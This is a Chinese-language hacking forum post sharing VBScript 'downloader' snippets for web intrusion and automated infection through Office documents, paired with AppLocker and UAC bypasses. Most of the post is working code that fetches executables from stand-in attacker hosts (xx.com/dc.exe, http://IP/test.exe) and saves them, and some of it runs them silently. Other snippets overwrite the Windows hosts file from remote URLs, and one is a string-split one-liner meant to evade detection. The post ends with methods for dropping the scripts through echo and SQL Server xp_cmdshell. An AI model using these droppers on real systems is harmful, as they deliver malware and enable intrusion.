簡易 vbs downloader

Nalyd 15天前 51

vbs downloader 用途

1. 手動上傳

通常是 web hacking,必要時搭配 upload bypass 手法繞過

2. 自動化感染

通常是搭配 office 類型檔案
- 第一隻 vbs 需具備檢測是否能對外上網
- 搭配 applocker bypass (for APT)

- 搭配 UAC bypass

- 下載第二隻 vbs,用於下載與執行真正的 .exe

- 刪除相關檔案

Sub download(url,target)
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET",url,False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target
ado.Close
End Sub
download "http://demo.site/demo.file","demo.file"


Sub download(url,target)
Const adTypeBinary = 1
Const adTypeText = 2
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP")
http.SetOption 2,13056
http.open "GET",url,False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target,adSaveCreateOverWrite
ado.Close
End Sub
Set WshShell=CreateObject("WScript.Shell")
WinDir =WshShell.ExpandEnvironmentStrings("%WinDir%")
HostsFile = WinDir & "\System32\Drivers\etc\Hosts"
Const hosts="https://smarthosts.googlecode.com/svn/trunk/hosts"
download hosts,HostsFile '下載 hosts 到 hostfile 指定目錄


'一句話
'關鍵是:
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> c:\d.vbs


Set xPost = CreateObject("Microsoft.XMLHTTP")  
xPost.Open "GET","http://www.xx.com/dc.exe",0
xPost.Send()  
Set sGet = CreateObject("ADODB.Stream")  
sGet.Mode = 3  
sGet.Type = 1  
sGet.Open()  
sGet.Write(xPost.responseBody)  
sGet.SaveToFile "c:/dc.exe",2


Set Post = CreateObject("Msxml2.XMLHTTP")  
Set Shell = CreateObject("Wscript.Shell")  
Post.Open "GET","http://IP/test.exe",0  
Post.Send()  
Set aGet = CreateObject("ADODB.Stream")  
aGet.Mode = 3  
aGet.Type = 1  
aGet.Open()  
aGet.Write(Post.responseBody)  
aGet.SaveToFile "c:\z.exe",2


iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
'save to file.vbs
'cscript c://file.vbs http://IP/file.exe c://file.exe


on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
'save to file.vbs
'cscript file.vbs http://demo/file.exe


on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://demo/file.exe",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\file.exe",2
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0
Wscript.Sleep 1000 '延遲
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
'save to file.vbs
'cscript c:\file.vbs


Sub download(url,target)
On Error Resume next
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET",url,False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target
ado.Close
End Sub
download "http://demo/file","file"


Sub download(url,target)
        Const adTypeBinary = 1          '数据类型二进制
        Const adTypeText = 2            '数据类型文本
        Const adSaveCreateOverWrite = 2 '覆盖已有文件
        Dim http,ado
    Set http = CreateObject("Msxml2.ServerXMLHTTP") '下载数据
        http.SetOption 2,13056                      '忽略https错误
        http.open "GET",url,False
        http.send
    Set ado = createobject("Adodb.Stream")
        ado.Type = adTypeBinary
        ado.Open
        ado.Write http.responseBody
        ado.SaveToFile target,adSaveCreateOverWrite '储存
        ado.Close
End Sub
Set WshShell=CreateObject("WScript.Shell") '创建WshShell对象使用win代码
WinDir =WshShell.ExpandEnvironmentStrings("%WinDir%") '环境变量
HostsFile = WinDir & "\System32\Drivers\etc\hosts"
Const hosts="https://raw.githubusercontent.com/hpp38122/h/master/Drive"
download hosts,HostsFile                    '下载hosts文件,保存在HostsFile位置
wshshell.run "cmd /c ipconfig /flushdns",0  '刷新DNS
MsgBox "hosts 数据已更新", vbInformation, "h"


strFileURL = "http://demo/file.exe"
strHDLocation = "file.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0   
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("file.exe")


echo 寫入法,一次寫入一行

echo your code-1 > downloader.vbs

echo your code-2 >> downloader.vbs


cmd.exe downloader.vbs


一次寫入兼執行

cmd.exe /c "@echo your code>poc.vbs&@echo your code>>file.vbs&cscript.exe file.vbs"


xp_cmdshell寫入法

exec ..xp_cmdshell 'echo your code-1 >d://SQLDATA//file.vbs'

exec ..xp_cmdshell 'echo your code-2 >>d://SQLDATA//file.vbs'


最后于 15天前 被Nalyd编辑 ,原因:
最新回復 (0)
全部樓主
返回